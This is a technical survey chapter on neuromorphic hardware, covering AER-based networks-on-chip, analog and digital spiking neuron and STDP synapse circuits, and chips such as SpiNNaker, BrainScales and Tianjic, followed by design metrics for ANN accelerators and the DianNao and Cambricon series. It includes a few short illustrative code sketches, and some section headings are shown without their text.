Each neuromorphic core implements a spiking neuron model, such as LIF, QIF, or
Izhikevich. The crossbar array mimics the dense local
connectivity of neurons, and each cross-point in the crossbar array is the synapse
memory. Combined with the learning block, it mimics the biological synapse
behaviors like STDP and SDSP. The local storage elements in each neuromorphic
core are used to store the synaptic weight, lookup tables for routing information,
and local data. The peripheral circuitry implements the communication interface
and also the drive circuits that control the input wires (i.e., axons) and output wire
(i.e., dendrites).
Fig. 11 2D-mesh routing scheme (a) with four cardinal, (b) with triangular facets
The high level of routers is connected with a 2D-tree topology, while the low level of routers
is organized as 2D-mesh topology. The DYNAPs neuromorphic chip adopts this
hybrid routing scheme.
When compared to the network structure of the brain, the 2D NoC is still limited
in connectivity and throughput. A 3D NoC, which mimics the 3D structure of the brain,
takes a step closer toward bio-plausible implementation. A 3D NoC, as shown in
Fig. 14, includes the vertical crossbar and the horizontal 2D NoC. This 3D NoC
improves the performance of the neuromorphic chip by shorter latency and higher
throughput. However, the state-of-the-art 3D NoC still cannot be implemented
in a typical single silicon chip since the chip fabrication process is two-dimensional.
Take the 3D NoC in the LaCSNN neuromorphic chip, for example: it is built by vertically
stacking multiple FPGA boards through a high-speed Terasic connector (Yang et al.
2018).
AER Protocol Since the spiking rate of a biological neuron is much lower
than that of electronic circuits in orders of magnitude, and the biological axonal
delays and neuron time constants are larger than electronic circuits’ propagation
and transition delay, the NoC in the bio-inspired neuromorphic chip or SNN
accelerator normally uses address event representation (AER) protocol to transmit
communication packets from one neuromorphic core to another. Each neuron has a
unique address to enable communication based on the AER protocol. When a neuron
generates a spike or an event, this spike information including the spiking neuron
address and the time of spiking will be transmitted to the destination neurons.
A simplified AER-based communication system is shown in Fig. 15. Whenever
the neuron on the transmitter side generates a spike or an event, the spike
information, including the corresponding neuron address, is encoded and
sent over the data bus to the destination receiving neurons. The decoder of the
receiving neurons decodes the incoming AER packets and reconstructs the sequence
of the spikes. Therefore, in this basic AER-based communication system, the spike
is explicitly encoded by its address, while the time of spiking is implicitly encoded
by the time when its address is sent to the data bus.
When compared to the frame-driven approach of the ANN accelerator, this AER-
based NoC communication system of the SNN accelerator is easier to scale. It
is possible to connect any number of neuromorphic cores as long as the routers
can manage the communication packet of the AER protocol. Thus, AER-based
NoC is suitable for not only the on-chip communication but also the chip-to-chip
communication, enabling larger-scale design.
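A minimal sketch of the AER idea is shown below: a spike is transmitted as the firing neuron's address, and spike timing is implicit in when the address appears on the bus; the (time, address) tuple representation is an illustrative assumption.

    # A minimal sketch of address event representation: the spike's identity
    # is explicit in the address, and its timing is implicit in when the
    # address appears on the bus.

    def aer_encode(spike_events):
        """Order (time, neuron_address) events as they appear on the bus."""
        return sorted(spike_events)

    def aer_decode(bus_words):
        """Rebuild per-neuron spike trains from the address stream."""
        trains = {}
        for t, addr in bus_words:
            trains.setdefault(addr, []).append(t)
        return trains

    events = [(3, 7), (1, 2), (3, 2), (9, 7)]
    print(aer_decode(aer_encode(events)))   # -> {2: [1, 3], 7: [3, 9]}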
Fig. 15 Simplified AER-based communication system
Circuit-Level Design Considerations
The main building blocks for the neuromorphic chip or SNN accelerator are
neuromorphic core and AER-based NoC. When implementing these building
blocks, the power-performance-area (PPA) is the main design consideration. It is
significant to choose a design technique that will not only mimic the behavior of the
biological brain but also with a good PPA (i.e., low power, high performance, and
small area). The state-of-the-art neurons are implemented using analog circuits or
digital circuits. Besides, to store synaptic weight and some local data, local memory
like SRAM has been employed in the neuromorphic cores, enabling near-memory
computing. Moreover, neurons and synapses can be implemented using memristive
technologies, which implement computing and storage in one memristive device,
while the AER NoC is normally implemented using digital circuits but can be either
synchronous or asynchronous circuit design technique.
Neurons Using Analog Circuits Various analog circuit designs could be used to
build a neuromorphic core including neuron and synapse, such as subthreshold
circuits, above-threshold circuits, switched-capacitor circuits, and so on. Metal
oxide semiconductor (MOS) transistors that operate in subthreshold or weak-
inversion regimes can be used to implement a first-order low-pass filter (LPF)
and thus can faithfully model bio-plausible temporal dynamics, since the current-
voltage characteristics of these transistors are exponential. For example, Fig. 16
shows the circuit schematic of the adaptive exponential IF neuron (Chicca et al.
2014). It consists of an input differential pair integrator as the LPF, a spike
generating amplifier, a spike reset circuit with refractory period functionality, and
a spike-frequency adaptation mechanism. MOS transistors ML1 − ML3 model
the leak conductance of the neuron, and they produce exponential subthreshold
dynamics in response to constant input currents. The capacitor Cmem represents the
neuron’s membrane capacitance, and the activation and inactivation dynamics of the
sodium channel are modeled by the positive-feedback circuits, i.e., MOS transistors
MA1 − MA6 . The potassium conductance and refractory period functionality are
modeled by the MR1 − MR6 , while the spike-frequency adaptation mechanism is
implemented by the MG1 −MG6 . These MOS transistors model the neuron’s calcium
conductance which generates the after-hyperpolarizing current that is proportional
to the spike’s firing rate. There are many biases, such as the Vthr , Vlk , Vthrahp , Vahp ,
Vlkahp , and Vref , in this neuron circuit schematic that can be tuned. By changing
these biases that control the neuron’s time constants, refractory period, and spike-
frequency adaptation dynamics, this circuit can model different spiking behaviors
ranging from regular spiking to bursting.
Although the subthreshold circuits can be used to build biophysically realistic
models with ultralow power consumption (ranging from between fractions of
pico- to hundreds of nano-amperes) and realistic time constants, they suffer from
high device mismatch especially for the large-scale neuromorphic chip or SNN
accelerator. The neuromorphic core implemented by the above-threshold circuits
and switched-capacitor circuits are more robust but with higher power consumption
than that of subthreshold circuits. Figure 17 shows an example of the Izhikevich
neuron implemented by the above-threshold circuits (Wijekoon and Dudek 2008).
The voltages across capacitors Cv and Cu represent the membrane potential and
slow variable of the Izhikevich model, respectively. The MOS transistors M1 − M5
together with the membrane capacitor Cv construct the membrane potential circuits.
The input currents, the positive feedback current of M3 generated by spike, and the
M4 leakage modeling the recovery variable of Izhikevich neuron are integrated on
the membrane capacitor. The positive feedback current is generated by M1 which
is controlled approximately quadratically by the membrane potential and mirrored
by the current mirror (M2 − M3 ). When a spike is fired, the analog comparator
(M9 − M14 ) will generate a reset pulse on the gate of transistor M5 , and then the
membrane potential will be hyperpolarized to a voltage value determined by the
voltage at node c. Transistors M1, M2, M6, M7, and M8 build the slow variable
circuit, where the current of M7 is determined by the membrane potential and M6
provides a nonlinear leakage current. The size of these transistors and the value of
the capacitors can be scaled to make the slow variable change more slowly than the
membrane potential.
Fig. 17 The Izhikevich neuron implemented by above-threshold circuits
Fig. 18 The Mihalas-Niebur neuron implemented by switched-capacitor circuits: (a) membrane
potential circuit, (b) adaptive threshold circuit
Switched-capacitor circuits have been widely used in analog circuits to realize
the variable resistor with a wide range of several orders of magnitude. This circuit
technique can also be used to build the neuron model. Figure 18 shows an example
of a switched-capacitor-based Mihalas-Niebur neuron that is a generalized version
of the LIF model with an adaptive threshold (Folowosele et al. 2009). It consists
of the membrane potential circuit (Fig. 18a) and the adaptive threshold circuit
(Fig. 18b). An analog comparator is used to compare the membrane potential Vmem
and the adaptive threshold Vth, and it will generate a spike when the membrane
potential is larger than the threshold. When a spike is generated, the membrane
potential is reset to the resting potential determined by the voltage at node EL.
The switched-capacitor SW 1 switched by two nonoverlapping clocks φ1 and φ2 is
used to model the conductance. The voltage divided by the two variable resistors
realized by two switched-capacitor circuits in the adaptive threshold circuit block,
i.e., SW 3 and SW 4, is used to generate the adaptive threshold.
Besides the neuron, the analog circuits can also be used to model the biological
synapse. Figure 19 shows an example of STDP synapse using analog circuits
(Indiveri et al. 2006), which can emulate the weight update curves in Fig. 7. The
charge stored on the weight capacitor Cw represents the weight of each synapse,
and the strength of the weight is inversely proportional to the voltage Vw at the
capacitor. When the presynaptic neuron fires, i.e., the signal P re on the gate of
M1 0 is a pulse, the voltage VrLT P on the diode-connected transistor M9 is copied to
V2 , the gate voltage of M13 . The leakage current of M11 decays V2 with time from
its peak voltage. When the postsynaptic neuron fires, a spike or pulse turns on M12 .
Thus, the weight is potentiated (i.e., Vw decrease) by an amount that reflects the time
elapsed since the last presynaptic neuron spikes. Similarly, the weight is weakened
if the circuit detects a noncausal interaction between a presynaptic neuron and a
postsynaptic neuron-generated spike. When a postsynaptic neuron fires, a pulse on
the gate of M15 charges the voltage V1 . The charge on the capacitor Cdep leaks
Fig. 19 An STDP synapse implemented by analog circuits (Indiveri et al. 2006)
through M16. Then, a nonlinear current Idep is drawn to decay the voltage Vw. When a presynaptic spike occurs soon after the postsynaptic spike, Vw is pulled up toward the supply voltage, i.e., the weight strength decreases.
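As a software reference for what such circuits emulate, the following is a minimal sketch of the pair-based STDP rule; the amplitudes and time constants (A_PLUS, A_MINUS, TAU_PLUS, TAU_MINUS) are illustrative assumptions, not values extracted from the circuit:

```python
import math

# Pair-based STDP: potentiate when pre precedes post (causal),
# depress when post precedes pre (noncausal). Illustrative constants.
A_PLUS, A_MINUS = 0.05, 0.055      # update amplitudes (assumed)
TAU_PLUS, TAU_MINUS = 20.0, 20.0   # decay time constants in ms (assumed)

def stdp_dw(t_pre: float, t_post: float) -> float:
    """Weight change for one pre/post spike pair (times in ms)."""
    dt = t_post - t_pre
    if dt > 0:   # pre before post: potentiation, decaying with dt
        return A_PLUS * math.exp(-dt / TAU_PLUS)
    else:        # post before pre: depression
        return -A_MINUS * math.exp(dt / TAU_MINUS)

# Example: a causal pair 5 ms apart strengthens the synapse.
print(stdp_dw(t_pre=10.0, t_post=15.0))   # positive dw
print(stdp_dw(t_pre=15.0, t_post=10.0))   # negative dw
```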
The circuits described above, including subthreshold circuits, above-threshold circuits, and switched-capacitor circuits, demonstrate the ability to model different neurons and synapses in the neuromorphic core. Analog circuits, especially subthreshold circuits, are suitable for modeling complex or biophysically realistic models, since transistors operating in the subthreshold regime exhibit exponential behavior. However, compared to digital circuits, analog circuits tend to accumulate errors easily and are much more prone to process-induced variations in chip fabrication.
Neurons Using Digital Circuits Although digital circuits, such as adders, multipliers, counters, and SRAM cells, can model complex neuron and synapse models, the heavy computation leads to a high implementation cost. State-of-the-art neuromorphic cores using digital circuits therefore tend to model simple biological dynamics like LIF. Both synchronous and asynchronous circuits have been used to build neuromorphic cores. Thanks to the mature standard ASIC design flow, most digital neuromorphic neurons are implemented with synchronous circuits that operate on a clock. A typical LIF digital neuron using synchronous circuits is shown in Fig. 20. The integrator unit accumulates the synaptic weight when a spike occurs, while a leak is subtracted from the accumulated membrane potential at every time tick. If the membrane potential is equal to or larger than the threshold, a spike is generated and transmitted, and the membrane potential is reset at the same time. The neuron operation proceeds until every spike from the previous timesteps is processed. All of these operations are updated at the rising or falling edge of the clock, i.e., the circuits operate synchronously.
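The update performed at each tick by such a synchronous LIF neuron can be summarized in a short sketch; the variable names and integer value ranges are illustrative assumptions:

```python
def lif_tick(v_mem: int, spike_weights: list[int],
             leak: int, v_th: int, v_reset: int = 0) -> tuple[int, bool]:
    """One clock tick of a digital LIF neuron.

    Accumulate the weights of all input spikes received this tick,
    subtract the leak, then compare against the threshold.
    """
    v_mem += sum(spike_weights)   # integrate synaptic input
    v_mem -= leak                 # constant leak per time tick
    if v_mem >= v_th:             # fire and reset
        return v_reset, True
    return v_mem, False

# Example: two input spikes with weights 3 and 4, leak 1, threshold 6.
v, fired = lif_tick(v_mem=0, spike_weights=[3, 4], leak=1, v_th=6)
print(v, fired)   # -> 0 True
```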
Fig. 20 A typical LIF digital neuron using synchronous circuits
Fig. 21 (a) Click-based link-joint asynchronous circuit, (b) Neuromorphic core using a digital
asynchronous circuit
Verilog representations converted from the CSP language are compatible with standard EDA tools. The converted Verilog can be synthesized using a standard-cell library with the addition of a few special customized cells, such as C-elements with combinational keepers and tunable delay-line cells. To facilitate convergent timing closure, all timing constraints apply only to neighboring, physically proximate pipeline stages at each level of the layout hierarchy. Hence, no global clock distribution layout is required, and timing analysis is not needed across different neuromorphic cores.
Logic simulation for asynchronous circuits is also important during chip design. The production rule simulator (PRSIM) (Akopyan et al. 2015) has been developed for logic simulation of asynchronous circuits. The input to PRSIM is a netlist based on production rules, which can be viewed as a sequence of spikes in neuromorphic computing. All spikes are stored in a queue, and a timestamp is attached to a spike when its preconditions become true. If the timestamp of a spike coincides with PRSIM's running clock, the production rule (i.e., the spike) is executed to verify correct circuit behavior.
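This queue-plus-timestamp scheduling resembles a simple discrete-event loop; the following is a minimal sketch of that pattern, not PRSIM's actual internals:

```python
import heapq, itertools

_seq = itertools.count()  # tiebreaker so the heap never compares actions

def run_events(initial_events):
    """Tiny discrete-event loop: execute each event when the running
    clock reaches its timestamp, possibly scheduling new events.

    Each event is (timestamp, name, action), where action returns a
    list of follow-up events.
    """
    queue = [(t, next(_seq), name, a) for t, name, a in initial_events]
    heapq.heapify(queue)
    while queue:
        t, _, name, action = heapq.heappop(queue)   # earliest event first
        print(f"t={t}: fire {name}")
        for nt, nname, naction in action(t):
            heapq.heappush(queue, (nt, next(_seq), nname, naction))

# Example: a spike at t=0 triggers a downstream spike 2 ticks later.
run_events([(0, "pre", lambda t: [(t + 2, "post", lambda t2: [])])])
```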
Since Carver Mead initiated the field of neuromorphic engineering (Mead 1990), there have been many breakthroughs in neuromorphic computing. In this section, some prominent neuromorphic chips or SNN accelerators are described. In terms of their main applications, state-of-the-art neuromorphic chips can be divided into two categories: those that assist computational neuroscience in emulating brain activity and those that accelerate SNNs performing commercially important tasks like classification and recognition. Many large-scale neuromorphic chips with complex neuronal mechanisms, such as SpiNNaker, Neurogrid, BrainScales, and LaCSNN, have been built for simulation of the biological brain. Meanwhile, more and more neuromorphic chips, such as TrueNorth, Loihi, ODIN, and Tianjic, have been designed based on simplified neural and synaptic primitives (e.g., the LIF neuron model and the STDP synapse model) to perform commercial tasks.
SpiNNaker
SpiNNaker (Furber et al. 2014; Liu et al. 2018) is a large-scale digital neuromorphic platform developed by the University of Manchester as part of the Human Brain Project (HBP). Instead of building custom circuits that model the neuron and synapse, SpiNNaker systems use processor cores to model biological behaviors, approaching the complexity of the brain in real time. A processor core with some local memory can thus simulate complex models of neurons (such as LIF and Izhikevich) and synapses (such as STDP). SpiNNaker is based on massively parallel computation with up to one million processor cores. They communicate with each other through very small packets but with high fan-in and fan-out connectivity, which mimics the human brain. Besides, SpiNNaker is an event-driven system, where a message or event arriving at a processor core triggers an interrupt that queues the event for processing by that core. The system has been designed to process small packets efficiently, keeping the event queue typically not much longer than one entry. Moreover, SpiNNaker provides a software stack through which spiking networks can be programmed with PyNN (a Python library supporting the portability of network designs between various neuronal simulators and hardware). Although SpiNNaker is highly programmable, it is neither energy efficient nor fast, especially for simulating complex neurons and synapses. The first generation of SpiNNaker is constructed from ARM968 processor cores. Eighteen of these processor cores with 96 KB of local memory, a packet router, and some other support peripherals are fabricated on a die. This die and another die with a 128 MB low-power SDRAM as the shared memory are stacked onto one package substrate and interconnected with gold wire bonding within a chip. Forty-eight such chips are assembled on one board, giving up to 864 processor cores. Chip-to-chip communication on the board is a custom protocol employing
Neurogrid
BrainScales
The BrainScales system (Schemmel et al. 2010; Friedmann et al. 2016), partly supported by the HBP, targets the emulation of most of the neural systems modeled in contemporary computational neuroscience at accelerated time scales. Compared to biological real time, the acceleration factor of BrainScales ranges from 10³ to 10⁵ for spiking neural network emulations. In other words, to emulate 10,000 s of biological behavior, the BrainScales system needs only about 1 s. BrainScales is designed around analog/digital mixed-signal circuits. A complex biological neuron model, the adaptive exponential IF model, which can be parameterized to exhibit diverse firing patterns, is implemented by analog circuits. The synapse and its plasticity function are implemented by analog/digital mixed-signal circuits. The event-driven communication system is realized by asynchronous digital circuits. The smallest silicon block of the BrainScales system is the High-Input Count Analog Neural Network (HiCANN) chip, consisting of a neuron block (up to 512 neurons), a synapse array (up to 14,000 synapses), routers for interconnection, and other necessary supporting circuits. Multiple HiCANN chips are wired directly on the silicon wafer, without cutting it into discrete elements, to build the BrainScales system. The software/hardware framework of BrainScales has been developed using PyNN, which allows users to map spiking neural networks onto the hardware for emulation. In the first generation of the BrainScales system, HiCANN chips were fabricated in 180 nm CMOS process technology in 2010. To realize wafer-scale integration, 352 HiCANN chips, containing 4 × 10⁶ synapses and up to 180,000 neurons, are wired on a single wafer. To enlarge the scale of the BrainScales system, wafer-to-wafer communication is also supported through FPGAs and 1 or 10 Gbit Ethernet links. The second generation of the BrainScales system is designed in 65 nm CMOS process technology. By combining general-purpose processors with fully custom analog circuits (the correlation sensor block) on the die, it enables flexibility in the implementable synapse learning mechanisms while keeping high efficiency, which is the major difference between the first and second generations of BrainScales. The correlation sensor block measures the time interval between pre- and postsynaptic spikes, while the embedded processors can perform arbitrary functions that compute updates to the synaptic weights from the correlation sensor information.
LaCSNN
LaCSNN (Yang et al. 2018) is a high biological realism neuromorphic chip system
implemented on FPGA with synchronous digital circuits. LaCSNN can simulate
large-scale conductance-based spiking neural networks in real time. At the cellular
level, the ionic channels, which play significant roles in neuronal activities, are
efficiently realized by using multiplier-less digital circuits (i.e., the lookup tables).
This implementation is based on a set of piecewise linear approximation-based
TrueNorth
Loihi
ODIN
Tianjic
for mapping. The Tianjic chip consists of 156 FCores, containing approximately 40,000 LIF neurons and 10 million synapses. These FCores are connected through a 2D mesh NoC. The chip is fabricated in 28 nm process technology with a chip area of 3.8 × 3.8 mm². An unmanned bicycle system assembled with just one Tianjic chip has shown that the chip can accelerate versatile algorithms and models at once, simultaneously performing multiple tasks including real-time object detection, tracking, voice control, obstacle avoidance, and balance control.
Although neuromorphic computing with complex models that mimic the human brain is a promising direction for future artificial intelligence, its practical application remains limited. For example, the accuracy of neuromorphic computing is still lower than that of Artificial Neural Networks (ANNs) on commercial tasks; most conventional computing or storage products are real-valued hardware, which is not well suited to event-based neuromorphic computing; and even the programming frameworks of neuromorphic computing differ from conventional ones. In terms of algorithms, software frameworks, and dedicated hardware, real-valued ANNs with simple models are more mature than neuromorphic computing. There are many ANN models, such as the convolutional neural network (CNN), the recurrent neural network (RNN), and the transformer. Along with these ANN models, there are also mature training algorithms; for example, backpropagation is a widely used training method. These ANNs can be developed in various software frameworks such as PyTorch, Keras, TensorFlow, and Darknet. Besides, ANNs can be conveniently deployed on dedicated hardware such as GPUs and even ASIC accelerators like the TPU and NPU. Thanks to these mature algorithms, software frameworks, and dedicated hardware, ANNs nowadays can outperform human beings in some tasks, such as recognizing faces and playing chess.
Inspired by the neural networks of the brain, ANNs are composed of artificial neurons and weighted connections. Unlike the neurons in neuromorphic computing that mimic biological neural dynamics, the artificial neurons in an ANN perform a multiply-and-accumulate operation (i.e., all the inputs of a neuron are weighted and summed, and normally a bias is added to the sum) followed by an activation function (normally a nonlinear function). Thus, the model of the ANN is much simpler than that of event-based neuromorphic computing. The connections in the ANN feed the output of one neuron as an input to another neuron. Each connection is assigned a weight representing its relative importance, and these weights are learned during ANN training.
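The computation of one such artificial neuron fits in a few lines; the choice of ReLU below is an illustrative assumption:

```python
def neuron(inputs: list[float], weights: list[float], bias: float) -> float:
    """One artificial neuron: weighted sum plus bias, then activation.

    ReLU is used here as a representative nonlinearity; any other
    activation (sigmoid, tanh, ...) slots in the same way.
    """
    z = sum(x * w for x, w in zip(inputs, weights)) + bias  # MAC + bias
    return max(0.0, z)                                      # ReLU

print(neuron([1.0, -2.0, 0.5], [0.3, 0.1, -0.4], bias=0.2))  # ~0.1
```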
Even though the ANN exploits only abstract and fundamental mathematical models of the findings in neuroscience, its practical advantages have been well recognized in the machine learning community, which drives the design of domain-specific architectures. Surveys in Schuman et al. (2017), Sze et al. (2017), and Chen et al. (2020) have provided sufficient technical background on the history of
In this section, we review the important design metrics for ANN accelerators, as illustrated in Fig. 25. Foremost, ANN architectures share the common design metrics of conventional designs in the semiconductor industry, namely functionality and PPA (performance, power consumption, and silicon area). Accuracy acts as an ANN-specific design metric because exactness is less in demand: most ANN tasks, e.g., vision and audio, are judged interactively by humans, for whom approximate values are highly acceptable. Consequently, designers trade off accuracy against PPA and even functionality to reduce manufacturing cost and time to market. Another critical design metric is the ecosystem. Since ANN accelerators are still in a booming phase, programming frameworks, system-level integration strategies, and open-source design templates are essential for standardization. Accelerators lacking programming support for state-of-the-art machine learning frameworks are unlikely to succeed. Last but not least, the remaining metrics, such as reliability, security, and support for design space exploration (DSE), are mostly at the research stage and will step into industry-level designs in the near future.
Fig. 25 Design metrics and associated key concerns for ANN accelerator
We briefly describe the primary design metrics and associated design concerns in the following.
memory (PNM) have been demonstrated, where computing and storage are spatially adjacent, so less data movement is required. For instance, PNM-style heterogeneously integrated designs, also known as 3D integration, have appeared in industrial accelerators. Novel devices such as memristors and spintronics promise huge power savings but currently lack mature programmability support.
Silicon Area The data-intensive nature of ANNs implies a chip design style filled with thousands of PEs and associated buffers. Accordingly, PEs and buffers can easily take up 90% of the silicon area. Since hardware implementations of large bit-width multiply-accumulate units, floating-point arithmetic, and nonlinear activation functions are very costly in area, optimization techniques should consider whether a huge number of PEs should be designed uniformly or asymmetrically. An asymmetric design style can greatly reduce area cost but introduces control complexity. Furthermore, to achieve sufficient output accuracy, different neural networks use different quantization strategies; symmetric but parallel data pipelines tend to occupy more silicon resources than necessary, since lower-bit data representations are usually sufficient. Likewise, the topology and size of buffers should be carefully allocated: small on-chip buffers may struggle to hold the minimal required activations for large kernels, while oversized buffers are not recommended because of fabrication cost. Novel devices, such as embedded DRAM, 3D ICs, and ReRAM, could become essential solutions for compact and cost-effective designs in the near future.
From the system-level perspective, typical ANN engines have become huge in size (James et al. 2020), which hurts both cost and yield. Current system-on-chip implementations can hardly adapt to this scaling trend. For domain-specific architectures, the chiplet is widely expected to become the future solution for system integration, with industry standards for inter-chiplet communication much anticipated.
Accuracy One important difference between ANN architectures and those in other domains is the approximation property of neural networks. Regression and classification, the two essential types of NN outputs, both tolerate variations in the intermediate computations within network layers, especially classification. Therefore, state-of-the-art inference accelerators adopt low-cost fixed-point computation and data representations to trade accuracy for silicon area. However, such approximate computing introduces significant design risks: functional correctness of the architecture alone does not guarantee any output accuracy. Although reported ANNs targeting vision-based tasks are claimed to reach sufficient accuracy with 8-bit integers for intermediate computation, this is not a general rule for evolving ANNs and larger images. Several kernels, such as shortcut and route, demand the merging of at least two layers with different data representations; careless handling of such kernels can cause a huge accuracy drop. Recurrent kernels such as GRU and LSTM have high precision requirements due to their large number of network coefficients and sigmoid/tanh activation functions, which makes small bit-width fixed-point data representations insufficient.
Ecosystem It is hard for any new accelerator to achieve public popularity. The challenge lies not only in its functionality and PPA but mostly in the compatibility of its tool kits with existing software and hardware frameworks, which constitute the ANN ecosystem. Currently, machine learning algorithms are developed and trained through mainstream frameworks such as PyTorch, TensorFlow, Keras, and Caffe. For on-site deployment, Darknet, Tensorflow RT, cuDNN, and PaddlePaddle are adopted to target various computing devices. To bridge the gap between software frameworks and physical devices, Apache TVM compiles various algorithm descriptions for CPUs, GPUs, and accelerators. From the hardware perspective, Nvidia's NVDLA is the first open-source machine learning accelerator and has become the initial RTL template for many industrial designs. The Versatile Tensor Accelerator (VTA) is an open, generic, and customizable deep learning accelerator with a complete TVM-based compiler stack. It is reasonable to anticipate that any ANN accelerator lacking compatibility with mainstream software frameworks can hardly survive, while conservatively following the existing open design templates will hinder novelty and breakthroughs.
Other Metrics Reliability and security are gradually becoming research hotspots for ANN architectures as the application domains of ANNs step into mission-critical systems. For instance, ANN accelerators used in airplanes and aerospace must tolerate both transient errors and permanent failures caused by highly radiated environments and harsh temperatures. Personalized ANN models must be guarded against hacking, ideally by intrinsic security mechanisms in the AI circuit. The inevitable adoption of ANNs in autonomous driving puts accelerator safety among the foremost design considerations. Research in the above directions is thriving rapidly. Current ANN execution models and architectures may possess potential weaknesses and are therefore subject to fundamental design updates. Furthermore, highly reliable and secure VLSI designs are extremely valuable and play key roles in military and national defense. Design prototypes targeting improvements in reliability and security are expected to keep appearing. Tools for design space exploration, such as engines for neural architecture search (NAS), are also well researched; they aim at fast identification of an ANN structure for a specific application and dataset and may be followed by automation of the hardware implementation process, such as software toolchain and HDL generation.
Although ANN hardware architectures are the main focus of this chapter, a successful ANN system demands a complete design flow involving cross-layer abstractions, as illustrated in Fig. 26.
Application Level Design: The design flow of the ML system originates at the application level, where the customer or designer provides the application (e.g., image classification and object detection (Iandola et al. 2016; Wu et al. 2017)) and fixes the constraints (Joulin et al. 2017) (e.g., accuracy, latency, and power consumption). Although the ANN achieves significant performance for selected application kernels, it cannot replace traditional rule-based algorithms in the remaining scenarios. The complete application is usually decomposed into subtasks, of which the ANN targets a few.
ANN Architecture Design: The ANN model is constructed (Krizhevsky et al. 2012; Iandola et al. 2016) through structural exploration and parameter training. The ANN structure is characterized by its number of layers and neurons per layer, its operation types, and the interconnection of the individual layers. Network parameters or weights are adjusted through training algorithms (e.g., backpropagation). Various template ANN models can be used as reference designs, such as the Yolo series for object detection, MobileNet for classification, and LSTM for voice recognition.
ANN Optimization: The default ANN models are usually large in parameter size, long in execution latency, or high in power consumption, and are therefore
hard-pressed to meet design constraints. Network optimization techniques have been heavily researched and practiced to reduce model size. For instance, weight pruning is adopted to compress the ANN structure, e.g., the number of layers, neurons, and channels (Sanh et al. 2020), while quantization (Iandola et al. 2016) is used to shorten the width of the data representation. State-of-the-art ANN optimization techniques can achieve a two-order-of-magnitude reduction in model size with negligible accuracy loss.
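A minimal sketch of these two techniques, magnitude-based weight pruning followed by uniform symmetric quantization, is shown below; the sparsity target and bit-width are illustrative assumptions, not values from any cited work:

```python
import numpy as np

def prune_and_quantize(w: np.ndarray, sparsity: float = 0.7, bits: int = 8):
    """Magnitude pruning + uniform symmetric quantization (illustrative).

    Weights whose magnitude falls below the sparsity-th percentile are
    zeroed; the survivors are mapped to signed integers of `bits` width.
    """
    thresh = np.quantile(np.abs(w), sparsity)      # pruning threshold
    w = np.where(np.abs(w) < thresh, 0.0, w)       # zero out small weights
    qmax = 2 ** (bits - 1) - 1                     # e.g., 127 for int8
    scale = max(np.abs(w).max() / qmax, 1e-12)     # avoid divide-by-zero
    q = np.round(w / scale).astype(np.int8)        # integer weights
    return q, scale                                # dequantize as q * scale

q, s = prune_and_quantize(np.random.randn(4, 4))
print(q, s)
```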
Frameworks and Libraries: After the ANN models are determined and optimized, they are deployed onto physical devices through machine learning frameworks such as TensorFlow and PyTorch. System-level libraries are leveraged to improve performance on heterogeneous computing architectures, e.g., the GPU cuDNN acceleration libraries (Chetlur et al. 2014). Frameworks and libraries are usually built and integrated as part of the operating system, which bridges the application with low-level machine languages.
ANN system designers should understand that enormous gains in design metrics can be achieved across the design abstractions. At each abstraction level, however, improvements vary significantly in terms of latency, operations, energy, and memory, as summarized in Table 2. At the application level, changing the application characteristics can yield improvements of up to 1000× even with the same underlying ANN models. For ANN model architectures, one can improve by the low end of the spectrum (∼4×) with negligible accuracy loss and achieve significant gains (∼50×) when allowing a small accuracy impact (<4%). With fixed application constraints and ANN model architectures, numerous optimization techniques can be applied to dramatically improve key parameters with
<0.5% impact on accuracy. Frameworks and libraries provide flexible yet powerful support for different architectures, resulting in large improvements with <0.5% accuracy impact. By closely co-designing hardware and software, one can obtain improvements without compromising accuracy, e.g., a 24× gate-count reduction by replacing 32-bit FP MACs with int4 MACs. Even pure hardware architecture design can gain improvements of 2–10×.
In various scenarios, one can obtain significant improvements by combining techniques at different abstraction levels. Suppose, for example, that the customer has fixed the application and the ANN model. In this case, one can achieve a 12–70× improvement with ANN optimizations and frameworks. If the accuracy requirements are relaxed, another 4–50× improvement can be gained.
Chen et al. (2014b): The next work in the DianNao series is DaDianNao ("Big computer" in Chinese), which uses DianNao as a submodule to build an on-chip supercomputer. The bottleneck when scaling the design into a supercomputer is main memory access; DaDianNao explored localized storage of ANN weights and activations in on-chip eDRAMs, which breaks the memory bandwidth limitation. The design is organized in a two-level hierarchy of tiles and nodes. Each tile contains a reproduction of DianNao, named the neural functional unit (NFU), and four eDRAM banks, whereas a node contains 16 tiles connected by an eDRAM router. DaDianNao proposed an aggressive architecture redesign for ANNs and foresaw the potential of performance scaling (450.65× over a K20M GPU) if the memory wall could be well addressed through advanced memory technology.
Du et al. (2015): Afterward, ShiDianNao ("Vision computer" in Chinese) integrated the NFU into the pipeline of an image processor to deploy CNNs on the camera. The incentive of the work was the elimination of costly DRAM accesses, which seemed surprising but was practically realizable for the benchmarked small-scale neural networks. Variations of the dataflow for various kernels were designed for increased energy efficiency.
Liu et al. (2015): The last member of the DianNao family, PuDianNao ("Prevalent computer" in Chinese), targeted increasing the supported machine learning primitives beyond ANNs, including k-nearest neighbors, k-means, support-vector machines (SVMs), and others. To achieve this, key computational tasks and locality properties were extracted for all ML primitives, which guided the augmentation of the NFU into a machine learning unit (MLU) with six pipeline stages. The instruction set architecture (ISA) was carefully designed to support different ML tasks.
Cambricon Series (Liu et al. 2016): After the commercialization of the DianNao series, the original DianNao team formally proposed Cambricon as an ISA for neural networks and demonstrated it on an IP named Cambricon-ACC. The motivation was that the variety of ever-increasing NN kernels had resulted in a huge expansion of the instruction set, causing significant physical burdens for the decoder. Inspired by RISC ISA design principles, Cambricon decomposed complex instructions (network layers) into shorter ones, which increases programming flexibility tremendously. With four types of instructions in the ISA, namely control, data transfer, computational, and logical, a large variety of ANN tasks, e.g., LSTM, autoencoder, and restricted Boltzmann machine, can be straightforwardly programmed and deployed.
Zhang et al. (2016): As the sizes of NNs increased from 650 thousand neurons in AlexNet (Krizhevsky et al. 2012) to 10 billion in Coates et al. (2013), intensive computation and memory accesses have been incurred, which makes efficient processing of state-of-the-art NNs on conventional accelerators a challenging problem. Algorithm designers attempted to optimize NN size through pruning and distillation, which resulted in sparse neural networks. However, NN accelerators such as DianNao fail to process sparse networks efficiently due to missing architectural support. To address this, Cambricon-X introduced an efficient indexing
module (IM) for selecting and transferring only the needed neurons from centralized neuron buffers with reduced bandwidth requirements. Taking advantage of the IM, each PE stores irregular and compressed synapses for local computation in an asynchronous fashion, which speeds up the processing of sparse NNs.
